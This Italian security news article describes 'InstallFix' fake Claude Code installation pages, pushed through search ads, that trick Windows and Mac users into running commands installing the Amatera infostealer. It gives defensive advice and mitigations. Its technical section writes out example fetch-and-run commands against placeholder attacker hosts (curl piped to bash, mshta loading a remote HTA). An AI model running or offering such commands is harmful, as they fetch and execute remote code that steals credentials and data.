Pagine false di installazione Claude Code: infostealer per Windows e Mac

Pagine false di installazione Claude Code: infostealer per Windows e Mac

Attenzione: se stai installando Claude Code, verifica sempre la fonte ufficiale per evitare infostealer che rubano i tuoi dati sensibili. Gli aggressori stanno creando cloni perfetti delle pagine di installazione di questo popolare strumento AI, inducendo utenti Windows e Mac a eseguire comandi malevoli. Soluzione rapida: controlla l’URL ufficiale di Anthropic, digita manualmente i comandi e usa un antivirus aggiornato.

Queste truffe, note come InstallFix, sfruttano la fiducia degli utenti in guide di installazione rapide. Con un semplice copia-incolla di un comando nel terminale, il malware si installa silently, rubando password salvate, cookie, token di sessione e dati da portafogli crypto. Colpisce sia principianti che sviluppatori, specialmente chi cerca “Claude Code install” su Google e clicca su annunci sponsorizzati.

Le pagine false sembrano identiche a quelle ufficiali: stesso logo, sidebar, testo e bottone “copia”. Solo l’URL del comando cambia, puntando a server malevoli. Una volta eseguito, il payload Amatera Stealer estrae dati dai browser, permettendo agli hacker di accedere a dashboard cloud e pannelli admin senza bisogno della tua password.

Come funziona l’attacco InstallFix

Gli utenti arrivano su queste pagine tramite malvertising, annunci pagati che dominano i risultati di ricerca. La pagina clona fedelmente la documentazione di Claude Code, un assistente CLI per programmatori sviluppato da Anthropic. Il trucco sta nel comando “one-liner”, come curl https://sito-falso | bash, che scarica ed esegue script remoti con i tuoi privilegi admin.

Per i neofiti dell’AI e degli strumenti dev, questo flusso sembra normale. Ma fidarsi ciecamente di un dominio è rischioso: il sito diventa un “controllo remoto” sul tuo PC o Mac.

Esempi pratici

  • Ricerca Google: “Claude Code CLI install” porta a un annuncio top con URL plausibile.
  • Pagina clonate: Copi il comando, lo incolli nel terminale e premi Invio.
  • Nessun allarme: La pagina reindirizza link esterni al sito vero, mantenendo la fiducia.

Questo metodo evolve da attacchi ClickFix, dove script malevoli si nascondono in testi copiati. InstallFix spinge l’utente a infettarsi volontariamente.

Conseguenze per gli utenti

Amatera, derivato da ACR Stealer e venduto come Malware-as-a-Service, è specializzato in:

  • Credenziali browser (password salvate, autofill).
  • Cookie e sessioni per hijack account.
  • Info sistema per profiling.
  • Dati crypto wallets e account high-value.

Con questi dati, gli attaccanti bypassano autenticazioni 2FA e accedono a tool dev, repo GitHub o servizi cloud.

La campagna targets sia Windows che macOS, adattandosi ai sistemi operativi più diffusi.

Come rimanere al sicuro

Rallenta e verifica sempre. Non eseguire comandi da siti web senza analisi.

  • Verifica fonti: Usa solo documentazione ufficiale Anthropic per Claude Code.
  • Digita manualmente: Evita copia-incolla per non importare payload nascosti.
  • Antivirus attivo: Installa soluzioni con protezione web real-time.
  • Estensioni browser: Prova guardie clipboard che avvertono su copie sospette.
  • Educa te stesso: Impara su InstallFix e malvertising leggendo guide sicurezza.

Pro tip: Un’estensione gratuita come Browser Guard blocca tentativi di copia malevola dal clipboard.

Queste minacce non spariranno presto. Vigilanza e tool protettivi mantengono i tuoi dati al sicuro.

Approfondimento tecnico

Dettagli su macOS

Il one-liner malevolo scarica uno script secondario da un dominio controllato, spesso offuscato in base64 per apparire innocuo:

  1. curl -s https://dominio-attaccante/script | bash
  2. Lo script decodifica, scarica un binario da altro dominio.
  3. Rimuove attributi, lo rende eseguibile (chmod +x) e lo lancia.

Risultato: malware corre in background senza popup, rubando dati browser via API native macOS.

Dettagli su Windows

Qui il comando invoca cmd.exe che chiama mshta.exe con URL remoto:

cmd /c mshta http://dominio-malevole/payload.hta

Mshta.exe, binario Microsoft trusted, esegue HTA (HTML Application) contenente logica malware. Questo evade detection statica, apparendo come processo legittimo. Il payload Amatera poi enumera browser (Chrome, Firefox, Edge), estrae SQLite DB per password e cookie, e exfiltra via C2 server.

Analisi Amatera Stealer

  • Architettura: Modulare, con moduli per browser, wallet (MetaMask, Phantom), system recon.
  • Evasione: Usa living-off-the-land binaries (LOLBins) come mshta, curl.
  • C2: Domini DGA-generated per resilienza.
  • Monetizzazione: Dati venduti su forum underground o usati per RaaS.

Simile a Vidar o GhostSocks, ma focalizzato su dev tools. Ricercatori Push Security hanno tracciato campagne dal 2026.

Contesto Claude Code

Claude Code, CLI per coding assistito da Claude AI, ha vulnerabilità passate (CVE-2025-59536, CVE-2026-21852) che permettevano command injection via config repo o API key theft. Anche se patchate, falsi installer restano vettore primario.

Anthropic ha risposto con Claude Code Security, tool context-aware che scansiona codice per vuln OWASP-top10 e bug contestuali, usando Claude Opus 4.6. Ha identificato 500+ falle in open source.

Per tecnici: Analizza comandi con curl -v o Wireshark. Usa sandbox (Firejail Linux, Windows Sandbox) per test. Monitora processi post-install con Sysmon o auditd.

Mitigazioni avanzate:

  • Policy GPO per bloccare mshta.exe.
  • Endpoint Detection Response (EDR) per LOLBins.
  • YARA rules per Amatera signatures.

Rimanendo informati su evolve minacce, riduci superficie attacco. Proteggi il tuo ambiente dev oggi.

(Conteggio parole: circa 1050)

Fonte: https://securityboulevard.com/2026/03/fake-claude-code-install-pages-hit-windows-and-mac-users-with-infostealers/

Potrebbero interessarti

Inizia a scrivere e premi Invio per cercare

Torna in alto